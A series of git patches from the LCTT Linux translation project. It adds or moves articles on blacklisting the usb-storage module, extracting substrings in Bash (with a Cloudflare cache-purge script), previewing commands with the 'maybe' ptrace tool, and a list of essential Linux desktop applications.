loaded when a usb-storage device is attached to the system & device would not be able to work. But this method has one little issue, that is when the kernel of the system is updated the usb-storage module would again show up in it’s default location. +现在在默认的位置上无法再找到驱动程序了,因此当 USB 存储器连接道系统上时也就无法加载到驱动程序了,从而导致磁盘不可用。 但是这个方法有一个小问题,那就是当系统内核更新的时候,usb-storage 模块会再次出现在它的默认位置。 -### Method 3- Blacklisting USB-storage +### 方法 3- 将 USB-storage 纳入黑名单 -We can also blacklist usb-storage using the file ‘/etc/modprobe.d/blacklist.conf’. This file is available on RHEL/CentOS 6 but might need to be created on 7\. To blacklist usb-storage, open/create the above mentioned file using vim, +我们也可以通过 `/etc/modprobe.d/blacklist.conf` 文件将 usb-storage 纳入黑名单。这个文件在 RHEL/CentOS 6 是现成就有的,但在 7 上可能需要自己创建。 要将 usb 存储列入黑名单,请使用 vim 打开/创建上述文件, +```shell $ sudo vim /etc/modprobe.d/blacklist.conf +``` -& enter the following line to blacklist the usb, +并输入以下行将 USB 纳入黑名单, +``` blacklist usb-storage +``` -Save file & exit. USB-storage will now be blocked on the system but this method has one major downside i.e. any privileged user can load the usb-storage module by executing the following command, +保存文件并退出。`usb-storage` 就在就会被系统阻止加载,但这种方法有一个很大的缺点,即任何特权用户都可以通过执行以下命令来加载 `usb-storage` 模块, +```shell $ sudo modprobe usb-storage +``` -This issue makes this method somewhat not desirable but it works well for non-privileged users. +这个问题使得这个方法不是那么理想,但是对于非特权用户来说,这个方法效果很好。 + +在更改完成后重新启动系统,以使更改生效。请尝试用这些方法来禁用 USB 存储,如果您遇到任何问题或有什么问题,请告知我们。 -Reboot your system after the changes have been made to implement the changes made for all the above mentioned methods. Do check these methods to disable usb storage & let us know if you face any issue or have a query using the comment box below. -------------------------------------------------------------------------------- @@ -52,7 +65,7 @@ via: http://linuxtechlab.com/disable-usb-storage-linux/ 译者:[lujun9972](https://github.com/lujun9972) 校对:[校对者ID](https://github.com/校对者ID) -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 +本文由 [LCTT](https://github.com/LCTT/TranslateProject)原创编译,[Linux 中国](https://linux.cn/)荣誉推出 [a]:http://linuxtechlab.com/author/shsuain/ [1]:http://linuxtechlab.com/ultimate-guide-to-securing-ssh-sessions/ From b4e99a24888fffca6bd67713a289564b693e2b4d Mon Sep 17 00:00:00 2001 From: darksun Date: Sat, 9 Dec 2017 13:04:03 +0800 Subject: [PATCH 0428/1627] move to translated --- .../tech/20170922 How to disable USB storage on Linux.md | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename {sources => translated}/tech/20170922 How to disable USB storage on Linux.md (100%) diff --git a/sources/tech/20170922 How to disable USB storage on Linux.md b/translated/tech/20170922 How to disable USB storage on Linux.md similarity index 100% rename from sources/tech/20170922 How to disable USB storage on Linux.md rename to translated/tech/20170922 How to disable USB storage on Linux.md From a517642863760dce3da0287f1b9b9ce32b08208b Mon Sep 17 00:00:00 2001 From: darksun Date: Sat, 9 Dec 2017 13:10:00 +0800 Subject: [PATCH 0429/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=20How=20to=20extr?= =?UTF-8?q?act=20substring=20in=20Bash?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...171206 How to extract substring in Bash.md | 153 ++++++++++++++++++ 1 file changed, 153 insertions(+) create mode 100644 sources/tech/20171206 How to extract substring in Bash.md diff --git a/sources/tech/20171206 How to extract substring in Bash.md b/sources/tech/20171206 How to extract substring in Bash.md new file mode 100644 index 0000000000..945b8bd4dd --- /dev/null +++ b/sources/tech/20171206 How to extract substring in Bash.md @@ -0,0 +1,153 @@ +translating by lujun9972 +How to extract substring in Bash +====== +A substring is nothing but a string is a string that occurs “in”. For example “3382” is a substring of “this is a 3382 test”. One can extract the digits or given string using various methods. + + [![How to Extract substring in Bash Shell on Linux or Unix](https://www.cyberciti.biz/media/new/faq/2017/12/How-to-Extract-substring-in-Bash-Shell-on-Linux-or-Unix.jpg)][2] + +This quick tutorial shows how to obtain or finds substring when using bash shell. + +### Extract substring in Bash + +The syntax is: ## syntax ## ${parameter:offset:length} The substring expansion is a bash feature. It expands to up to length characters of the value of parameter starting at the character specified by offset. For example, $u defined as follows: + +| +``` +## define var named u ## +u="this is a test" +``` + | + +The following substring parameter expansion performs substring extraction: + +| +``` +var="${u:10:4}" +echo "${var}" +``` + | + +Sample outputs: + +``` +test +``` + +* 10 : The offset + +* 4 : The length + +### Using IFS + +From the bash man page: + +> The Internal Field Separator that is used for word splitting after expansion and to split lines into words with the read builtin command. The default value is . + +Another POSIX ready solution is as follows: + +| +``` +u="this is a test" +set -- $u +echo "$1" +echo "$2" +echo "$3" +echo "$4" +``` + | + +Sample outputs: + +``` +this +is +a +test +``` + +| +``` +#!/bin/bash +#################################################### +## Author - Vivek Gite {https://www.cyberciti.biz/} +## Purpose - Purge CF cache +## License - Under GPL ver 3.x+ +#################################################### +## set me first ## +zone_id="YOUR_ZONE_ID_HERE" +api_key="YOUR_API_KEY_HERE" +email_id="YOUR_EMAIL_ID_HERE" + +## hold data ## +home_url="" +amp_url="" +urls="$@" + +## Show usage +[ "$urls" == "" ] && { echo "Usage: $0 url1 url2 url3"; exit 1; } + +## Get home page url as we have various sub dirs on domain +## /tips/ +## /faq/ + +get_home_url(){ + local u="$1" + IFS='/' + set -- $u + echo "${1}${IFS}${IFS}${3}${IFS}${4}${IFS}" +} + +echo +echo "Purging cache from Cloudflare..." +echo +for u in $urls +do + home_url="$(get_home_url $u)" + amp_url="${u}amp/" + curl -X DELETE "https://api.cloudflare.com/client/v4/zones/${zone_id}/purge_cache" \ + -H "X-Auth-Email: ${email_id}" \ + -H "X-Auth-Key: ${api_key}" \ + -H "Content-Type: application/json" \ + --data "{\"files\":[\"${u}\",\"${amp_url}\",\"${home_url}\"]}" + echo +done +echo +``` + | + +I can run it as follows: ~/bin/cf.clear.cache https://www.cyberciti.biz/faq/bash-for-loop/ https://www.cyberciti.biz/tips/linux-security.html + +### Say hello to cut command + +One can remove sections from each line of file or variable using the cut command. The syntax is: + +| +``` +u="this is a test" +echo "$u" | cut -d' ' -f 4 +echo "$u" | cut --delimiter=' ' --fields=4 +########################################## +## WHERE +## -d' ' : Use a whitespace as delimiter +## -f 4 : Select only 4th field +########################################## +var="$(cut -d' ' -f 4 <<< $u)" +echo "${var}" +``` + | + +For more info read bash man page: man bash man cut See also: [Bash String Comparison: Find Out IF a Variable Contains a Substring][1] + +-------------------------------------------------------------------------------- + +via: https://www.cyberciti.biz/faq/how-to-extract-substring-in-bash/ + +作者:[Vivek Gite][a] +译者:[lujun9972](https://github.com/lujun9972) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.cyberciti.biz +[1]:https://www.cyberciti.biz/faq/bash-find-out-if-variable-contains-substring/ +[2]:https://www.cyberciti.biz/media/new/faq/2017/12/How-to-Extract-substring-in-Bash-Shell-on-Linux-or-Unix.jpg From f224365a53215245f94a098b27f34811e732ab82 Mon Sep 17 00:00:00 2001 From: imquanquan Date: Sat, 9 Dec 2017 13:17:28 +0800 Subject: [PATCH 0430/1627] translated --- ...ram Will Exactly Do Before Executing It.md | 143 ++++++++++++++++++ 1 file changed, 143 insertions(+) create mode 100644 translated/tech/20171204 How To Know What A Command Or Program Will Exactly Do Before Executing It.md diff --git a/translated/tech/20171204 How To Know What A Command Or Program Will Exactly Do Before Executing It.md b/translated/tech/20171204 How To Know What A Command Or Program Will Exactly Do Before Executing It.md new file mode 100644 index 0000000000..5123c87df9 --- /dev/null +++ b/translated/tech/20171204 How To Know What A Command Or Program Will Exactly Do Before Executing It.md @@ -0,0 +1,143 @@ +如何获知一个命令或程序在执行前将会做什么 +====== + +有没有想过一个 Unix 命令在执行前将会干些什么呢?并不是每个人都会知道一个特定的命令或者程序将会做什么。当然,你可以用 [Explainshell][2] 来查看它。你可以在 Explainshell 网站中粘贴你的命令,然后它可以让你了解命令的每个部分做了什么。但是,这是没有必要的。现在,我们从终端就可以轻易地知道一个命令或者程序在执行前会做什么。 `maybe` ,一个简单的工具,它允许你运行一条命令并可以查看此命令对你的文件系统做了什么而实际上这条命令却并未执行!在查看 `maybe` 的输出列表后,你可以决定是否真的想要运行这条命令。 + +#### “maybe”是如何工作的 + +根据开发者的介绍 + +> `maybe` 利用 `python-ptrace` 库运行了一个在 `ptrace` 控制下的进程。当它截取到一个即将更改文件系统的系统调用时,它会记录该调用,然后修改 CPU 寄存器,将这个调用重定向到一个无效的系统调用 ID(将其变成一个无效操作(no-op)),并将这个无效操作(no-op)的返回值设置为有效操作的返回值。结果,这个进程认为,它所做的一切都发生了,实际上什么都没有改变。 + +警告: 在生产环境或者任何你所关心的系统里面使用这个工具时都应该小心。它仍然可能造成严重的损失,因为它只能阻止少数系统调用。 + +#### 安装 “maybe” + +确保你已经在你的 Linux 系统中已经安装了 `pip` 。如果没有,可以根据您使用的发行版,按照如下指示进行安装。 + +在 Arch Linux 及其衍生产品(如 Antergos,Manjaro Linux)上,使用以下命令安装 `pip` : + +``` +sudo pacman -S python-pip +``` + +在 RHEL,CentOS 上: + +``` +sudo yum install epel-release +``` +``` +sudo yum install python-pip +``` + +在 Fedora 上: + +``` +sudo dnf install epel-release +``` +``` +sudo dnf install python-pip +``` + +在 Debian,Ubuntu,Linux Mint 上: + +``` +sudo apt-get install python-pip +``` + +在 SUSE, openSUSE 上: + +``` +sudo zypper install python-pip +``` + +安装 `pip` 后,运行以下命令安装 `maybe` 。 + +``` +sudo pip install maybe +``` + +#### 了解一个命令或程序在执行前会做什么 + +用法是非常简单的!只要在要执行的命令前加上 `maybe` 即可。 + +让我给你看一个例子: + +``` +$ maybe rm -r ostechnix/ +``` + +如你所看到的,我从我的系统中删除一个名为 `ostechnix` 的文件夹。下面是示例输出: + +``` +maybe has prevented rm -r ostechnix/ from performing 5 file system operations: + + delete /home/sk/inboxer-0.4.0-x86_64.AppImage + delete /home/sk/Docker.pdf + delete /home/sk/Idhayathai Oru Nodi.mp3 + delete /home/sk/dThmLbB334_1398236878432.jpg + delete /home/sk/ostechnix + +Do you want to rerun rm -r ostechnix/ and permit these operations? [y/N] y +``` + + [![](http://www.ostechnix.com/wp-content/uploads/2017/12/maybe-1.png)][3] + + + `maybe` 执行 5 个文件系统操作,并向我显示该命令(rm -r ostechnix /)究竟会做什么。现在我可以决定是否应该执行这个操作。是不是很酷呢?确实很酷! + +这是另一个例子。我要为 Gmail 安装 Inboxer 桌面客户端。这是我得到的输出: + +``` +$ maybe ./inboxer-0.4.0-x86_64.AppImage +fuse: bad mount point `/tmp/.mount_inboxemDzuGV': No such file or directory +squashfuse 0.1.100 (c) 2012 Dave Vasilevsky + +Usage: /home/sk/Downloads/inboxer-0.4.0-x86_64.AppImage [options] ARCHIVE MOUNTPOINT + +FUSE options: + -d -o debug enable debug output (implies -f) + -f foreground operation + -s disable multi-threaded operation + +open dir error: No such file or directory +maybe has prevented ./inboxer-0.4.0-x86_64.AppImage from performing 1 file system operations: + +create directory /tmp/.mount_inboxemDzuGV + +Do you want to rerun ./inboxer-0.4.0-x86_64.AppImage and permit these operations? [y/N] +``` + +如果它没有检测到任何文件系统操作,那么它会只显示如下所示的结果。 + +例如,我运行下面这条命令来更新我的 Arch Linux。 + +``` +$ maybe sudo pacman -Syu +sudo: effective uid is not 0, is /usr/bin/sudo on a file system with the 'nosuid' option set or an NFS file system without root privileges? +maybe has not detected any file system operations from sudo pacman -Syu. +``` + +看到没?它没有检测到任何文件系统操作,所以没有任何警告。这非常棒,而且正是我所预料到的结果。从现在开始,我甚至可以在执行之前知道一个命令或一个程序将执行什么操作。我希望这对你也会有帮助。 + +Cheers! + +资源: + +* [“maybe” GitHub page][1] + +-------------------------------------------------------------------------------- + +via: https://www.ostechnix.com/know-command-program-will-exactly-executing/ + +作者:[SK][a] +译者:[imquanquan](https://github.com/imquanquan) +校对:[校对ID](https://github.com/校对ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.ostechnix.com/author/sk/ +[1]:https://github.com/p-e-w/maybe +[2]:https://www.ostechnix.com/explainshell-find-part-linux-command/ +[3]:http://www.ostechnix.com/wp-content/uploads/2017/12/maybe-1.png +[4]:https://www.ostechnix.com/inboxer-unofficial-google-inbox-desktop-client/ From 410b1ae7f47c5cac2943635a501bc3a3f02c66af Mon Sep 17 00:00:00 2001 From: imquanquan Date: Sat, 9 Dec 2017 13:21:58 +0800 Subject: [PATCH 0431/1627] delete sources --- ...ram Will Exactly Do Before Executing It.md | 145 ------------------ 1 file changed, 145 deletions(-) delete mode 100644 sources/tech/20171204 How To Know What A Command Or Program Will Exactly Do Before Executing It.md diff --git a/sources/tech/20171204 How To Know What A Command Or Program Will Exactly Do Before Executing It.md b/sources/tech/20171204 How To Know What A Command Or Program Will Exactly Do Before Executing It.md deleted file mode 100644 index bc7b2c9cb2..0000000000 --- a/sources/tech/20171204 How To Know What A Command Or Program Will Exactly Do Before Executing It.md +++ /dev/null @@ -1,145 +0,0 @@ -translating by imquanquan - -How To Know What A Command Or Program Will Exactly Do Before Executing It -====== -Ever wondered what a Unix command will do before executing it? Not everyone knows what a particular command or program will do. Of course, you can check it with [Explainshell][2]. You need to copy/paste the command in Explainshell website and it let you know what each part of a Linux command does. However, it is not necessary. Now, we can easily know what a command or program will exactly do before executing it, right from the Terminal. Say hello to “maybe”, a simple tool that allows you to run a command and see what it does to your files without actually doing it! After reviewing the output listed, you can then decide whether you really want to run it or not. - -#### How “maybe” works? - -According to the developer, - -> “maybe” runs processes under the control of ptrace with the help of python-ptrace library. When it intercepts a system call that is about to make changes to the file system, it logs that call, and then modifies CPU registers to both redirect the call to an invalid syscall ID (effectively turning it into a no-op) and set the return value of that no-op call to one indicating success of the original call. As a result, the process believes that everything it is trying to do is actually happening, when in reality nothing is. - -Warning: You should be very very careful when using this utility in a production system or in any systems you care about. It can still do serious damages, because it will block only a handful of syscalls. - -#### Installing “maybe” - -Make sure you have installed pip in your Linux system. If not, install it as shown below depending upon the distribution you use. - -On Arch Linux and its derivatives like Antergos, Manjaro Linux, install pip using the following command: - -``` -sudo pacman -S python-pip -``` - -On RHEL, CentOS: - -``` -sudo yum install epel-release -``` - -``` -sudo yum install python-pip -``` - -On Fedora: - -``` -sudo dnf install epel-release -``` - -``` -sudo dnf install python-pip -``` - -On Debian, Ubuntu, Linux Mint: - -``` -sudo apt-get install python-pip -``` - -On SUSE, openSUSE: - -``` -sudo zypper install python-pip -``` - -Once pip installed, run the following command to install “maybe”. - -``` -sudo pip install maybe -``` - -#### Know What A Command Or Program Will Exactly Do Before Executing It - -Usage is absolutely easy! Just add “maybe” in front of a command that you want to execute. - -Allow me to show you an example. - -``` -$ maybe rm -r ostechnix/ -``` - -As you can see, I am going to delete a folder called “ostechnix” from my system. Here is the sample output. - -``` -maybe has prevented rm -r ostechnix/ from performing 5 file system operations: - - delete /home/sk/inboxer-0.4.0-x86_64.AppImage - delete /home/sk/Docker.pdf - delete /home/sk/Idhayathai Oru Nodi.mp3 - delete /home/sk/dThmLbB334_1398236878432.jpg - delete /home/sk/ostechnix - -Do you want to rerun rm -r ostechnix/ and permit these operations? [y/N] y -``` - - [![](http://www.ostechnix.com/wp-content/uploads/2017/12/maybe-1.png)][3] - -The “maybe” tool performs 5 file system operations and shows me what this command (rm -r ostechnix/) will exactly do. Now I can decide whether I should perform this operation or not. Cool, yeah? Indeed! - -Here is another example. I am going to install [Inboxer][4] desktop client for Gmail. This is what I got. - -``` -$ maybe ./inboxer-0.4.0-x86_64.AppImage -fuse: bad mount point `/tmp/.mount_inboxemDzuGV': No such file or directory -squashfuse 0.1.100 (c) 2012 Dave Vasilevsky - -Usage: /home/sk/Downloads/inboxer-0.4.0-x86_64.AppImage [options] ARCHIVE MOUNTPOINT - -FUSE options: - -d -o debug enable debug output (implies -f) - -f foreground operation - -s disable multi-threaded operation - -open dir error: No such file or directory -maybe has prevented ./inboxer-0.4.0-x86_64.AppImage from performing 1 file system operations: - -create directory /tmp/.mount_inboxemDzuGV - -Do you want to rerun ./inboxer-0.4.0-x86_64.AppImage and permit these operations? [y/N] -``` - -If it not detects any file system operations, then it will simply display a result something like below. - -For instance, I run this command to update my Arch Linux. - -``` -$ maybe sudo pacman -Syu -sudo: effective uid is not 0, is /usr/bin/sudo on a file system with the 'nosuid' option set or an NFS file system without root privileges? -maybe has not detected any file system operations from sudo pacman -Syu. -``` - -See? It didn’t detect any file system operations, so there were no warnings. This is absolutely brilliant and exactly what I was looking for. From now on, I can easily know what a command or a program will do even before executing it. I hope this will be useful to you too. More good stuffs to come. Stay tuned! - -Cheers! - -Resource: - -* [“maybe” GitHub page][1] - --------------------------------------------------------------------------------- - -via: https://www.ostechnix.com/know-command-program-will-exactly-executing/ - -作者:[SK][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://www.ostechnix.com/author/sk/ -[1]:https://github.com/p-e-w/maybe -[2]:https://www.ostechnix.com/explainshell-find-part-linux-command/ -[3]:http://www.ostechnix.com/wp-content/uploads/2017/12/maybe-1.png -[4]:https://www.ostechnix.com/inboxer-unofficial-google-inbox-desktop-client/ From 0d5f003231dd1bc69833e95b9a73246610d7af12 Mon Sep 17 00:00:00 2001 From: darksun Date: Sat, 9 Dec 2017 13:59:39 +0800 Subject: [PATCH 0432/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=2024=20Must=20Hav?= =?UTF-8?q?e=20Essential=20Linux=20Applications=20In=202017?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...ve Essential Linux Applications In 2017.md | 251 ++++++++++++++++++ 1 file changed, 251 insertions(+) create mode 100644 sources/tech/20171208 24 Must Have Essential Linux Applications In 2017.md diff --git a/sources/tech/20171208 24 Must Have Essential Linux Applications In 2017.md b/sources/tech/20171208 24 Must Have Essential Linux Applications In 2017.md new file mode 100644 index 0000000000..c5c214eb1d --- /dev/null +++ b/sources/tech/20171208 24 Must Have Essential Linux Applications In 2017.md @@ -0,0 +1,251 @@ +24 Must Have Essential Linux Applications In 2017 +====== +Brief: What are the must have applications for Linux? The answer is subjective and it depends on for what purpose do you use your desktop Linux. But there are still some essentials Linux apps that are more likely to be used by most Linux user. We have listed such best Linux applications that you should have installed in every Linux distribution you use. + +The world of Linux, everything is full of alternatives. You have to choose a distro? You have got several dozens of them. Are you trying to find a decent music player? Alternatives are there too. + +But not all of them are built with the same thing in mind – some of them might target minimalism while others might offer tons of features. Finding the right application for your needs can be quite confusing and a tiresome task. Let’s make that a bit easier. + +### Best free applications for Linux users + +I’m putting together a list of essential free Linux applications I prefer to use in different categories. I’m not saying that they are the best, but I have tried lots of applications in each category and finally liked the listed ones better. So, you are more than welcome to mention your favorite applications in the comment section. + +We have also compiled a nice video of this list. Do subscribe to our YouTube channel for more such educational Linux videos: + +### Web Browser + +![Web Browsers](https://itsfoss.com/wp-content/uploads/2016/10/Essential-Linux-Apps-Web-Browser-1024x512.jpg) +[Save][1]Web Browsers + +#### [Google Chrome][12] + +Google Chrome is a powerful and complete solution for a web browser. It comes with excellent syncing capabilities and offers a vast collection of extensions. If you are accustomed to Google eco-system Google Chrome is for you without any doubt. If you prefer a more open source solution, you may want to try out [Chromium][13], which is the project Google Chrome is based on. + +#### [Firefox][14] + +If you are not a fan of Google Chrome, you can try out Firefox. It’s been around for a long time and is a very stable and robust web browser. + +#### [Vivaldi][15] + +However, if you want something new and different, you can check out Vivaldi. Vivaldi takes a completely fresh approach towards web browser. It’s from former team members of Opera and built on top of the Chromium project. It’s lightweight and customizable. Though it is still quite new and still missing out some features, it feels amazingly refreshing and does a really decent job. + +[Suggested read[Review] Otter Browser Brings Hope To Opera Lovers][40] + +### Download Manager + +![Download Managers](https://itsfoss.com/wp-content/uploads/2016/10/Essential-Linux-Apps-Download-Manager-1024x512.jpg) +[Save][2]Download Managers + +#### [uGet][16] + +uGet is the best download manager I have come across. It is open source and offers everything you can expect from a download manager. uGet offers advanced settings for managing downloads. It can queue and resume downloads, use multiple connections for downloading large files, download files to different directories according to categories and so on. + +#### [XDM][17] + +Xtreme Download Manager (XDM) is a powerful and open source tool developed with Java. It has all the basic features of a download manager, including – video grabber, smart scheduler and browser integration. + +[Suggested read4 Best Download Managers For Linux][41] + +### BitTorrent Client + +![BitTorrent Clients](https://itsfoss.com/wp-content/uploads/2016/10/Essential-Linux-Apps-BitTorrent-Client-1024x512.jpg) +[Save][3]BitTorrent Clients + +#### [Deluge][18] + +Deluge is a open source BitTorrent client. It has a beautiful user interface. If you are used to using uTorrent for Windows, Deluge interface will feel familiar. It has various configuration options as well as plugins support for various tasks. + +#### [Transmission][19] + +Transmission takes the minimal approach. It is an open source BitTorrent client with a minimal user interface. Transmission comes pre-installed with many Linux distributions. + +[Suggested readTop 5 Torrent Clients For Ubuntu Linux][42] + +### Cloud Storage + +![Cloud Storages](https://itsfoss.com/wp-content/uploads/2016/10/Essential-Linux-Apps-Cloud-Storage-1024x512.jpg) +[Save][4]Cloud Storages + +#### [Dropbox][20] + +Dropbox is one of the most popular cloud storage service available out there. It gives you 2GB free storage to start with. Dropbox has a robust and straight-forward Linux client. + +#### [MEGA][21] + +MEGA offers 50GB of free storage. But that is not the best thing about it. The best thing about MEGA is that it has end-to-end encryption support for your files. MEGA has a solid Linux client named MEGAsync. + +[Suggested readBest Free Cloud Services For Linux in 2017][43] + +### Communication + +![Communication Apps](https://itsfoss.com/wp-content/uploads/2016/10/Essential-Linux-Apps-Communication-1024x512.jpg) +[Save][5]Communication Apps + +#### [Pidgin][22] + +Pidgin is an open source instant messenger client. It supports many chatting platforms including – Google Talk, Yahoo and even IRC. Pidgin is extensible through third-party plugins, that can provide a lot of additional functionalities to Pidgin. + +You can also use [Franz][23] or [Rambox][24] to use several messaging services in one application. + +#### [Skype][25] + +We all know Skype, it is one of the most popular video chatting platforms. Recently it has [released a brand new desktop client][26] for Linux. + +[Suggested read6 Best Messaging Apps Available For Linux In 2017][44] + +### Office Suite + +![Office Suites](https://itsfoss.com/wp-content/uploads/2016/10/Essential-Linux-Apps-Office-Suite-1024x512.jpg) +[Save][6]Office Suites + +#### [LibreOffice][27] + +LibreOffice is the most actively developed open source office suite for Linux. It has mainly six modules – Writer, Calc, Impress, Draw, Math and Base. And every one of them supports a wide range of file formats. LibreOffice also supports third-party extensions. It is the default office suite for many of the Linux distributions. + +#### [WPS Office][28] + +If you want to try out something other than LibreOffice, WPS Office might be your go-to. WPS Office suite includes writer, presentation and spreadsheets support. + +[Suggested read6 Best Open Source Alternatives to Microsoft Office for Linux][45] + +### Music Player + +![Music Players](https://itsfoss.com/wp-content/uploads/2016/10/Essential-Linux-Apps-Music-Player-1024x512.jpg) +[Save][7]Music Players + +#### [Lollypop][29] + +This is a relatively new music player. Lollypop is open source and has a beautiful yet simple user interface. It offers a nice music organizer, scrobbling support, online radio and a party mode. Though it is a simple music player without so many advanced features, it is worth giving it a try. + +#### [Rhythmbox][30] + +Rhythmbox is the music player mainly developed for GNOME desktop environment but it works on other desktop environments as well. It does all the basic tasks of a music player, including – CD Ripping & Burning, scribbling etc. It also has support for iPod. + +#### [cmus][31] + +If you want minimalism and love your terminal window, cmus is for you. Personally, I’m a fan and user of this one. cmus is a small, fast and powerful console music player for Unix-like operating systems. It has all the basic music player features. And you can also extend its functionalities with additional extensions and scripts. + +[Suggested readHow To Install Tomahawk Player In Ubuntu 14.04 And Linux Mint 17][46] + +### Video Player + +![Video Player](https://itsfoss.com/wp-content/uploads/2016/10/Essential-Linux-Apps-Video-Player-1024x512.jpg) +[Save][8]Video Players + +#### [VLC][32] + +VLC is an open source media player. It is simple, fast, lightweight and really powerful. VLC can play almost any media formats you can throw at it out-of-the-box. It can also stream online medias. It also have some nifty extensions for various tasks like downloading subtitles right from the player. + +#### [Kodi][33] + +Kodi is a full-fledged media center. Kodi is open source and very popular among its user base. It can handle videos, music, pictures, podcasts and even games, from both local and network media storage. You can even record TV with it. The behavior of Kodi can be customized via add-ons and skins. + +[Suggested read4 Format Factory Alternative In Linux][47] + +### Photo Editor + +![Photo Editors](https://itsfoss.com/wp-content/uploads/2016/10/Essential-Linux-Apps-Photo-Editor-1024x512.jpg) +[Save][9]Photo Editors + +#### [GIMP][34] + +GIMP is the Photoshop alternative for Linux. It is open source, full-featured and professional photo editing software. It is packed with a wide range of tools for manipulating images. And on top of that, there is various customization options and third-party plugins for enhancing the experience. + +#### [Krita][35] + +Krita is mainly a painting tool but serves as a photo editing application as well. It is open source and packed with lots of sophisticated and advanced tools. + +[Suggested readBest Photo Applications For Linux][48] + +### Text Editor + +Every Linux distribution comes with their own solution for text editors. Generally, they are quite simple and without much functionality. But here are some text editors with enhanced capabilities. + +![Text Editors](https://itsfoss.com/wp-content/uploads/2016/10/Essential-Linux-Apps-Text-Editor-1024x512.jpg) +[Save][10]Text Editors + +#### [Atom][36] + +Atom is the modern and hackable text editor maintained by GitHub. It is completely open-source and offers everything you can think of to get out of a text editor. You can use it right out-of-the-box or you can customize and tune it just the way you want. And it has a ton of extensions and themes from the community up for grab. + +#### [Sublime Text][37] + +Sublime Text is one of the most popular text editors. Though it is not free, it allows you to use the software for evaluation without any time limit. Sublime Text is a feature-rich and sophisticated piece of software. And of course, it has plugins and themes support. + +[Suggested read4 Best Modern Open Source Code Editors For Linux][49] + +### Launcher + +![Launchers](https://itsfoss.com/wp-content/uploads/2016/10/Essential-Linux-Apps-Launcher-1024x512.jpg) +[Save][11]Launchers + +#### [Albert][38] + +Albert is inspired by Alfred (a productivity application for Mac, which is totally kickass by-the-way) and still in the development phase. Albert is fast, extensible and customizable. The goal is to “Access everything with virtually zero effort”. It integrates with your Linux distribution nicely and helps you to boost your productivity. + +#### [Synapse][39] + +Synapse has been around for years. It’s a simple launcher that can search and run applications. It can also speed up various workflows like – controlling music, searching files, directories, bookmarks etc., running commands and such. + +As Abhishek advised, we will keep this list of best Linux software updated with our readers’ (i.e. yours) feedback. So, what are your favorite must have Linux applications? Share with us and do suggest more categories of software to add to this list. + +-------------------------------------------------------------------------------- + +via: https://itsfoss.com/essential-linux-applications/ + +作者:[Munif Tanjim][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://itsfoss.com/author/munif/ +[1]:http://pinterest.com/pin/create/bookmarklet/?media=https://itsfoss.com/wp-content/uploads/2016/10/Essential-Linux-Apps-Web-Browser-1024x512.jpg&url=https://itsfoss.com/essential-linux-applications/&is_video=false&description=Web%20Browsers +[2]:http://pinterest.com/pin/create/bookmarklet/?media=https://itsfoss.com/wp-content/uploads/2016/10/Essential-Linux-Apps-Download-Manager-1024x512.jpg&url=https://itsfoss.com/essential-linux-applications/&is_video=false&description=Download%20Managers +[3]:http://pinterest.com/pin/create/bookmarklet/?media=https://itsfoss.com/wp-content/uploads/2016/10/Essential-Linux-Apps-BitTorrent-Client-1024x512.jpg&url=https://itsfoss.com/essential-linux-applications/&is_video=false&description=BitTorrent%20Clients +[4]:http://pinterest.com/pin/create/bookmarklet/?media=https://itsfoss.com/wp-content/uploads/2016/10/Essential-Linux-Apps-Cloud-Storage-1024x512.jpg&url=https://itsfoss.com/essential-linux-applications/&is_video=false&description=Cloud%20Storages +[5]:http://pinterest.com/pin/create/bookmarklet/?media=https://itsfoss.com/wp-content/uploads/2016/10/Essential-Linux-Apps-Communication-1024x512.jpg&url=https://itsfoss.com/essential-linux-applications/&is_video=false&description=Communication%20Apps +[6]:http://pinterest.com/pin/create/bookmarklet/?media=https://itsfoss.com/wp-content/uploads/2016/10/Essential-Linux-Apps-Office-Suite-1024x512.jpg&url=https://itsfoss.com/essential-linux-applications/&is_video=false&description=Office%20Suites +[7]:http://pinterest.com/pin/create/bookmarklet/?media=https://itsfoss.com/wp-content/uploads/2016/10/Essential-Linux-Apps-Music-Player-1024x512.jpg&url=https://itsfoss.com/essential-linux-applications/&is_video=false&description=Music%20Players +[8]:http://pinterest.com/pin/create/bookmarklet/?media=https://itsfoss.com/wp-content/uploads/2016/10/Essential-Linux-Apps-Video-Player-1024x512.jpg&url=https://itsfoss.com/essential-linux-applications/&is_video=false&description=Video%20Player +[9]:http://pinterest.com/pin/create/bookmarklet/?media=https://itsfoss.com/wp-content/uploads/2016/10/Essential-Linux-Apps-Photo-Editor-1024x512.jpg&url=https://itsfoss.com/essential-linux-applications/&is_video=false&description=Photo%20Editors +[10]:http://pinterest.com/pin/create/bookmarklet/?media=https://itsfoss.com/wp-content/uploads/2016/10/Essential-Linux-Apps-Text-Editor-1024x512.jpg&url=https://itsfoss.com/essential-linux-applications/&is_video=false&description=Text%20Editors +[11]:http://pinterest.com/pin/create/bookmarklet/?media=https://itsfoss.com/wp-content/uploads/2016/10/Essential-Linux-Apps-Launcher-1024x512.jpg&url=https://itsfoss.com/essential-linux-applications/&is_video=false&description=Launchers +[12]:https://www.google.com/chrome/browser +[13]:https://www.chromium.org/Home +[14]:https://www.mozilla.org/en-US/firefox +[15]:https://vivaldi.com +[16]:http://ugetdm.com/ +[17]:http://xdman.sourceforge.net/ +[18]:http://deluge-torrent.org/ +[19]:https://transmissionbt.com/ +[20]:https://www.dropbox.com +[21]:https://mega.nz/ 